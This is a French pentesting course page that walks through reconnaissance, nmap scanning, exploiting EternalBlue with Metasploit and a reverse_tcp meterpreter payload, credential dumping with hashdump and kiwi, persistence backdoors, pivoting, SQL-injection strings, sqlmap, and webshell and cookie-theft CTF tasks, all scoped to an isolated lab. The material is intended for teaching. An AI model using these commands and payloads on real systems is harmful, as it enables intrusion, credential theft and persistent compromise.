⚔️ TP Pentesting complet · Labs EVE-NG · Metasploit · OWASP🛡️ Certification Cybersécurité · Diplôme PDF gratuit🤖 Certification IA & LLM · Prompt Engineering · RAG · Agents⚗️ Lab Proxmox · Dell R630 · EVE-NG📝 Blog Cybersécurité · Articles techniques💼 Formations intra-entreprise · Devis gratuit⚔️ TP Pentesting complet · Labs EVE-NG · Metasploit · OWASP🛡️ Certification Cybersécurité · Diplôme PDF gratuit🤖 Certification IA & LLM · Prompt Engineering · RAG · Agents⚗️ Lab Proxmox · Dell R630 · EVE-NG📝 Blog Cybersécurité · Articles techniques💼 Formations intra-entreprise · Devis gratuit
Zyneris
Zyneris
Formation · Cyber · IA
Devis → ↩ PLL
Zyneris Zyneris
⚔️ Formation Pentesting Labs EVE-NG · Kali Linux · Metasploit 3 jours · Avancé

TP Pentesting —
De la reconnaissance
au rapport d\'audit

Formation pratique complète au test d\'intrusion. Chaque concept est immédiatement mis en pratique sur des cibles vulnérables dans le lab isolé Proxmox VLAN 30. Théorie minimale, mains dans la machine maximale.

⏱ 3 jours
21 heures
👥 Max 8
stagiaires
🎯 Lab isolé
VLAN 30
📄 Rapport
professionnel exigé
⚠️ Cadre légal Toutes les activités de cette formation se déroulent exclusivement sur des systèmes de démonstration isolés dans le VLAN 30 du lab Zyneris. L\'application de ces techniques sur des systèmes tiers sans autorisation écrite est illégale (article 323-1 du Code pénal). Ce que vous apprenez ici, c\'est pour défendre — pas pour attaquer.
Module 1 · Reconnaissance Module 2 · Scanning Module 3 · Exploitation Module 4 · Post-exploitation Module 5 · Web & OWASP Module 6 · Rapport
🔍
Module 1 · Jour 1 — Matin

Reconnaissance & OSINT

La reconnaissance est la phase la plus longue d\'un vrai pentest. Un attaquant patient collecte des informations publiquement disponibles pendant des jours avant de toucher à quoi que ce soit. Nous allons reproduire cette démarche méthodique.

Théorie — Les 4 types de reconnaissance

Passive externe
Collecte d'infos sur la cible sans JAMAIS la contacter directement. Totalement légale et indétectable. Sources : DNS, WHOIS, moteurs de recherche, réseaux sociaux.
Risque légal : Nul
Active externe
Interaction directe avec les systèmes exposés de la cible (scan de ports, fingerprinting). Laisse des traces dans les logs. Nécessite une autorisation.
Risque légal : Modéré
Passive interne
Une fois sur le réseau cible : écoute passive du trafic, analyse des broadcasts. ARP watch, Wireshark silencieux.
Risque légal : Modéré
Active interne
Depuis un accès obtenu : scan du réseau interne, énumération AD, pivot. Phase post-exploitation.
Risque légal : Élevé

Outils OSINT — Démonstration

kali@zyneris-lab — OSINT Reconnaissance
# 1. WHOIS — Qui possède le domaine cible ?
kali$ whois target-corp.com
Domain Name: TARGET-CORP.COM · Registrar: Gandi SAS · Created: 2018-03-15
Admin Email: admin@target-corp.com · Name Servers: ns1.ovh.net, ns2.ovh.net

# 2. DNS Enumeration — Quels sous-domaines existent ?
kali$ subfinder -d target-corp.com -all -recursive
[INF] Found: mail.target-corp.com
[INF] Found: vpn.target-corp.com <-- Intéressant !
[INF] Found: dev.target-corp.com <-- Très intéressant !
[INF] Found: staging.target-corp.com

# 3. theHarvester — Emails et métadonnées publiques
kali$ theHarvester -d target-corp.com -b google,linkedin,bing
[*] Emails found: j.dupont@target-corp.com, admin@target-corp.com
[*] Hosts found: 185.199.108.153 → www.target-corp.com

# 4. Shodan — Quels équipements exposent des ports sur internet ?
kali$ shodan host 185.199.108.153
Open ports: 22/tcp (SSH OpenSSH 8.2), 80/tcp (Apache 2.4.41), 443/tcp (nginx)
[!] Port 8080 open — Apache Tomcat 9.0.30 (version obsolète !)
TP · Exercice 1 ⏱ 30 minutes · Niveau débutant

Reconnaissance OSINT sur la cible lab01.zyneris.local

Dans votre lab EVE-NG (Lab 08), une cible simulée est disponible à l\'adresse 10.30.0.10. Votre mission : collecter un maximum d\'informations sans jamais la scanner activement.

Objectifs :
1.Identifier le système d'exploitation via les bannières visibles
2.Trouver les emails exposés dans les fichiers robots.txt et sitemap.xml
3.Lister les fichiers publiquement accessibles via Google Dorks : site:target inurl:backup
4.Trouver les technologies utilisées via Wappalyzer ou whatweb en mode passif
5.Documenter toutes vos découvertes dans le template de rapport fourni
Livrable attendu : Un fichier Markdown "recon-lab01.md" avec section par outil utilisé, informations trouvées, et votre analyse des risques associés.
📡
Module 2 · Jour 1 — Après-midi

Scanning & Énumération

Le scanning transforme les hypothèses en certitudes. Nmap est l\'outil de référence — mais c\'est sa maîtrise des options qui fait la différence entre un scan bruyant qui déclenche toutes les alertes et un scan chirurgical qui reste sous le radar.

Nmap — Maîtrise des techniques de scan

TechniqueCommandeUsageBruit réseau
SYN Scan (Half-open) nmap -sS -p- 10.30.0.10 Discret, rapide, nécessite root Modéré
Full TCP Connect nmap -sT -p 80,443,8080 10.30.0.10 Sans root. Plus lent, facilement détectable Élevé
UDP Scan nmap -sU --top-ports 100 10.30.0.10 Lent mais révèle DNS, SNMP, NTP, TFTP Modéré
Service Version nmap -sV -sC 10.30.0.10 Identifie versions exactes = CVE associés Élevé
OS Detection nmap -O 10.30.0.10 Fingerprinting OS via TTL et options TCP Modéré
Vulnérabilités nmap --script=vuln 10.30.0.10 Scripts NSE d'analyse de vulnérabilités Très élevé
Discret décalé nmap -sS -T2 --randomize-hosts 10.30.0.0/24 Scan lent avec timing réduit Faible

Énumération des services découverts

Exemple de résultats après nmap -sV -sC 10.30.0.10
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu
80/tcp open http Apache httpd 2.4.29 <-- CVE-2017-9798 !
443/tcp open ssl/https nginx 1.14.0
3306/tcp open mysql MySQL 5.7.21 <-- Base de données exposée !
8080/tcp open http-proxy Apache Tomcat 9.0.30 <-- Manager non protégé ?

# Énumération HTTP avec nikto
kali$ nikto -h http://10.30.0.10
[+] /admin/ : Directory indexing enabled
[+] /backup.sql : Database backup found!
[+] X-Frame-Options header not set (clickjacking)
[+] /phpinfo.php : PHP info exposed (version, config)

# Énumération SMB avec enum4linux
kali$ enum4linux -a 10.30.0.10
[+] Users found: admin, john.doe, service_account
[+] Password policy: min 6 chars, no complexity... (faible !)
TP · Exercice 2 ⏱ 45 minutes · Niveau intermédiaire

Cartographie complète du réseau 10.30.0.0/24

Dans votre lab EVE-NG (Lab 08), 5 machines sont actives sur le réseau CyberLab. Votre mission : cartographier le réseau complet et identifier les services vulnérables.

1.Découvrir toutes les machines actives (ping sweep) sans déclencher d'alerte
2.Scanner les 100 ports les plus communs sur chaque hôte découvert
3.Identifier les versions exactes de chaque service exposé
4.Chercher les CVE associés via searchsploit pour chaque service
5.Créer un schéma de réseau annoté avec les cibles prioritaires
Livrable attendu : Rapport de scan Nmap en XML (nmap -oX scan-results.xml) + tableau des vulnérabilités prioritaires classées par CVSS.
Module 3 · Jour 2 — Matin

Exploitation avec Metasploit

Metasploit Framework est l\'outil d\'exploitation le plus utilisé en pentest. Sa force : une base de modules maintenue en permanence, un shell interactif puissant, et une capacité à enchaîner exploit → payload → post-exploitation de façon cohérente.

Architecture Metasploit

Auxiliary
Modules de scan, énumération, fuzzing. Pas de payload. Ex : auxiliary/scanner/portscan/tcp
Exploits
Modules qui exploitent une vulnérabilité pour exécuter un payload. Ex : exploit/multi/handler
Payloads
Code exécuté après l'exploit. Singles (autonomes), Stagers (2 étapes), Meterpreter
Post
Modules de post-exploitation : dump d'identifiants, pivot, escalade de privilèges
Encoders
Encodage des payloads pour éviter la détection par les antivirus
Evasion
Techniques de contournement des défenses (AV, EDR, AMSI)

Exploitation pas à pas — EternalBlue MS17-010

Contexte : MS17-010 (EternalBlue) est la vulnérabilité utilisée par WannaCry en 2017. Notre cible lab tourne une version Windows Server 2008 R2 intentionnellement non patchée pour l\'exercice.
msfconsole — Exploitation MS17-010 EternalBlue
msf6> search eternalblue
# Name Rank Description
0 exploit/windows/smb/ms17_010_eternalblue excellent Windows SMB

msf6> use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(ms17_010_eternalblue)> set RHOSTS 10.30.0.20
RHOSTS => 10.30.0.20
msf6 exploit(ms17_010_eternalblue)> set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue)> set LHOST 10.30.0.100
msf6 exploit(ms17_010_eternalblue)> run

[*] Started reverse TCP handler on 10.30.0.100:4444
[+] 10.30.0.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] WIN - EXPLOIT SUCCESSFUL — Meterpreter session 1 opened!

meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter> hashdump
Administrator:500:aad3b....:31d6c... (hash NTLM)
meterpreter> screenshot
Screenshot saved to /tmp/screenshot.png
TP · Exercice 3 ⏱ 90 minutes · Niveau avancé

Obtenir un shell Meterpreter sur target-win.lab

La cible 10.30.0.20 est un Windows Server 2008 R2 non patché. Vous avez identifié MS17-010 lors du scan. Votre mission : exploiter, obtenir un shell SYSTEM, et prouver l\'accès.

1.Vérifier la vulnérabilité avec auxiliary/scanner/smb/smb_ms17_010
2.Configurer l'exploit avec le bon payload Meterpreter (reverse_tcp)
3.Exécuter l'exploit et ouvrir le shell Meterpreter
4.Récupérer la liste des processus actifs (ps)
5.Dump les hashes NTLM (hashdump) — noter les hashes pour le module suivant
6.Créer une backdoor persistante (persistence -X -i 30)
7.Pivoter vers 10.30.0.30 (réseau interne simulé)
Livrable attendu : Captures d\'écran de chaque étape + note de pentest avec hash récupéré + CVE exploité + recommandation de remédiation (WSUS, MS17-010 patch).
🔑
Module 4 · Jour 2 — Après-midi

Post-exploitation & Pivoting

L\'accès initial n\'est qu\'un point de départ. La post-exploitation explore le système compromis : collecte d\'identifiants, escalade de privilèges, maintien d\'accès, pivot vers d\'autres machines. C\'est souvent la phase la plus riche en informations pour le commanditaire.

🔑 Collecte de credentials

meterpreter> load kiwi
meterpreter> creds_all
[+] admin : Password123! (cleartext)
[+] service_account : S3rv1ce@2023 (cleartext)

meterpreter> run post/windows/gather/enum_shares
[+] Share: \\SERVEUR\Finance (accessible!)

🌐 Pivoting vers le réseau interne

meterpreter> run autoroute -s 192.168.100.0/24
[+] Route ajoutée vers 192.168.100.0/24

meterpreter> background
msf6> use auxiliary/scanner/portscan/tcp
msf6> set RHOSTS 192.168.100.0/24
[+] 192.168.100.15:445 open — DC trouvé !
TP · Exercice 4 ⏱ 60 minutes · Niveau avancé

Pivoting et accès au Domain Controller

À partir de votre shell SYSTEM sur 10.30.0.20, pivotez vers le réseau 192.168.100.0/24 et tentez d\'accéder au Domain Controller.

1.Charger Kiwi et extraire tous les identifiants en mémoire
2.Ajouter une route Metasploit vers le réseau 192.168.100.0/24
3.Scanner le réseau 192.168.100.0/24 à travers le pivot
4.Utiliser les identifiants récupérés pour accéder au DC via psexec
5.Récupérer la liste des utilisateurs AD (net user /domain)
6.Identifier les comptes à haut privilège (Domain Admins)
🕷️
Module 5 · Jour 3 — Matin

Pentest Web & OWASP Top 10

80% des applications web contiennent au moins une vulnérabilité critique. L\'OWASP Top 10 liste les plus courantes. Nous allons les tester sur DVWA (Damn Vulnerable Web Application) et WebGoat dans le lab.

A01
Contrôle d'accès défaillant
Impact : Contourner l'authentification SQL
admin' OR '1'='1' --
Tester sur login.php : Username: admin'-- Password: (vide). Observer l\'accès obtenu. Corriger avec PDO/prepared statements.
A02
Défaillances cryptographiques
Impact : Chiffrement faible ou absent
Analyse des headers HTTP
Vérifier avec curl -I : HSTS présent ? TLS 1.0/1.1 activé ? Cookies sans Secure flag ? httponly manquant ?
A03
Injection SQL
Impact : Extraction de la base de données
sqlmap -u "url?id=1" --dbs
Sur DVWA niveau Low : sqlmap -u "http://10.30.0.30/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=xxx;security=low" --dbs
A07
XSS Cross-Site Scripting
Impact : Vol de cookies de session
Injecter dans un champ de recherche non filtré. Observer le popup. Tenter un vol de cookie réel avec un serveur d'écoute Python.
A09
Composants vulnérables
Impact : Exploits connus sur composants obsolètes
searchsploit apache 2.4.29
Identifier tous les composants (framework, plugins) et leur version. Chercher les CVE avec searchsploit ou NVD.
TP · Exercice 5 — CTF Web ⏱ 90 minutes · Challenge

Trouver les 5 flags sur l\'application DVWA

L\'application DVWA sur 10.30.0.30 contient 5 flags cachés. Chaque flag correspond à une vulnérabilité OWASP à exploiter. Format : FLAG{xxxxxxxx}

Flag #1 🔑
SQLi — Extraire le hash du mot de passe admin dans la table users
Flag #2 🍪
XSS Stocké — Voler le cookie de session de l'administrateur connecté
Flag #3 📁
Directory Traversal — Lire le fichier /etc/passwd via ../
Flag #4 📤
File Upload — Uploader un webshell PHP et l'exécuter
Flag #5 🔓
Brute Force — Casser le mot de passe admin avec Hydra
📄
Module 6 · Jour 3 — Après-midi

Rédiger un rapport de pentest professionnel

Un pentest sans rapport n\'a aucune valeur. Le rapport est le livrable principal — ce que le client conserve, présente à sa direction, utilise pour décider des investissements sécurité. Sa qualité conditionne la crédibilité du prestataire.

Structure d\'un rapport professionnel

1
Résumé exécutif
1 page max. Rédigé pour le COMEX — pas les techniciens. Résultat global, niveau de risque, 3 recommandations prioritaires.
2
Périmètre et méthodologie
IP/domaines testés, dates, type de test (black/white/grey box), outils utilisés, limitations.
3
Résultats — Vulnérabilités critiques
Pour chaque CVE/faille : description, preuve (capture d'écran/output), impact métier, CVSS score, remédiation.
4
Résultats — Vulnérabilités modérées
Même structure, niveau de risque inférieur.
5
Résultats — Points positifs
Ce qui est bien fait. Un bon rapport pentesteur note aussi les contrôles efficaces.
6
Plan de remédiation priorisé
Tableau : Vulnérabilité · Priorité · Effort estimé · Responsable · Délai recommandé.
7
Annexes techniques
Dumps complets, logs Nmap, scripts utilisés, timeline d'attaque.
🏆 PROJET FINAL · Évaluation 3h · Rendu avant 17h00

Rapport de pentest complet sur l\'infrastructure ACME Corp (simulée)

L\'entreprise ACME Corp (simulée dans le lab) vous a mandaté pour un pentest black-box de son infrastructure. Vous disposez uniquement de : le nom de domaine acme.lab et d\'un accès au réseau depuis 10.30.0.100.

📋
Critères d'évaluation
Complétude de la reconnaissance (20pts) · Pertinence des vulnérabilités (30pts) · Qualité des preuves (20pts) · Rapport exécutif (20pts) · Remédiation (10pts)
📁
Livrables attendus
Rapport PDF (structure professionnelle) · Fichiers de preuves (screenshots, logs Nmap) · Présentation 10 min devant le groupe
S\'inscrire à cette formation → Voir le lab EVE-NG